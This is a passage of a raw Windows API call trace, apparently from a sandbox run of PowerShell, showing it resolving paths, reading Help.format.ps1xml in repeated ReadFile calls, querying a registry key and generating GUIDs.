lpBuffer=0x10cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0108.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0108.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.463] VirtualQuery (in: lpAddress=0x10bb80, lpBuffer=0x10ca40, dwLength=0x30 | out: lpBuffer=0x10ca40*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.464] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x783866f2, Data2=0xb1c1, Data3=0x410c, Data4=([0]=0x8e, [1]=0x83, [2]=0x84, [3]=0xcb, [4]=0xb3, [5]=0x8a, [6]=0x32, [7]=0x3f))) returned 0x0 [0108.464] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.466] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x2031f1a4, Data2=0x32e7, Data3=0x4e3d, Data4=([0]=0xaf, [1]=0x25, [2]=0x20, [3]=0x50, [4]=0xcf, [5]=0x26, [6]=0xfa, [7]=0x41))) returned 0x0 [0108.466] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x2eb39489, Data2=0xbc46, Data3=0x4e53, Data4=([0]=0x82, [1]=0x93, [2]=0xa4, [3]=0x51, [4]=0x71, [5]=0x9b, [6]=0x33, [7]=0xf8))) returned 0x0 [0108.467] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xdd439a29, Data2=0x9797, Data3=0x40b1, Data4=([0]=0xbb, [1]=0x0, [2]=0x50, [3]=0x3a, [4]=0x43, [5]=0x68, [6]=0x80, [7]=0x4e))) returned 0x0 [0108.467] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.468] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0108.469] SetErrorMode (uMode=0x1) returned 0x1 [0108.469] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x340 [0108.469] GetFileType (hFile=0x340) returned 0x1 [0108.469] SetErrorMode (uMode=0x1) returned 0x1 [0108.469] GetFileType (hFile=0x340) returned 0x1 [0108.470] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.483] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.669] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.669] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.670] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.671] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.671] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.671] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.672] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.672] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.673] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.673] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.673] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.674] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.674] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.675] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.677] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.677] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.678] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.678] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.678] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.679] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.679] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.679] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.679] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.680] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.681] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.681] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.681] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.681] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.682] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.682] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.685] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.686] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.686] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.686] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.687] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.687] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.687] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.687] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.688] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.688] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.688] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.688] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.688] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.689] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.689] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.689] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.689] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.690] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.690] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.690] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.690] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.690] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.691] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.691] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.691] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.691] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.691] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.692] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.692] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.692] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0108.692] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0xf37, lpOverlapped=0x0) returned 1 [0108.693] ReadFile (in: hFile=0x340, lpBuffer=0x35f10f7, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f10f7*, lpNumberOfBytesRead=0x10d058*=0x0, lpOverlapped=0x0) returned 1 [0108.693] ReadFile (in: hFile=0x340, lpBuffer=0x35f1a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x35f1a58*, lpNumberOfBytesRead=0x10d058*=0x0, lpOverlapped=0x0) returned 1 [0108.693] CloseHandle (hObject=0x340) returned 1 [0108.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0108.693] SetErrorMode (uMode=0x1) returned 0x1 [0108.693] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d000 | out: lpFileInformation=0x10d000*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0108.693] SetErrorMode (uMode=0x1) returned 0x1 [0108.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0108.694] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d0e8 | out: phkResult=0x10d0e8*=0x340) returned 0x0 [0108.694] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d06c, lpData=0x0, lpcbData=0x10d068*=0x0 | out: lpType=0x10d06c*=0x1, lpData=0x0, lpcbData=0x10d068*=0x56) returned 0x0 [0108.694] CoTaskMemAlloc (cb=0x5a) returned 0x2a1c30 [0108.694] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d03c, lpData=0x2a1c30, lpcbData=0x10d038*=0x56 | out: lpType=0x10d03c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d038*=0x56) returned 0x0 [0108.694] CoTaskMemFree (pv=0x2a1c30) [0108.694] RegCloseKey (hKey=0x340) returned 0x0 [0108.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0108.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0108.719] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xfba142e8, Data2=0xb0b5, Data3=0x46ab, Data4=([0]=0x9c, [1]=0x82, [2]=0x7e, [3]=0x8d, [4]=0xd6, [5]=0xb6, [6]=0x10, [7]=0xf3))) returned 0x0 [0108.720] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x4ed3b198, Data2=0xd00f, Data3=0x4913, Data4=([0]=0xa4, [1]=0x23, [2]=0xd1, [3]=0xd1, [4]=0x9f, [5]=0x46, [6]=0x84, [7]=0xce))) returned 0x0 [0108.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, 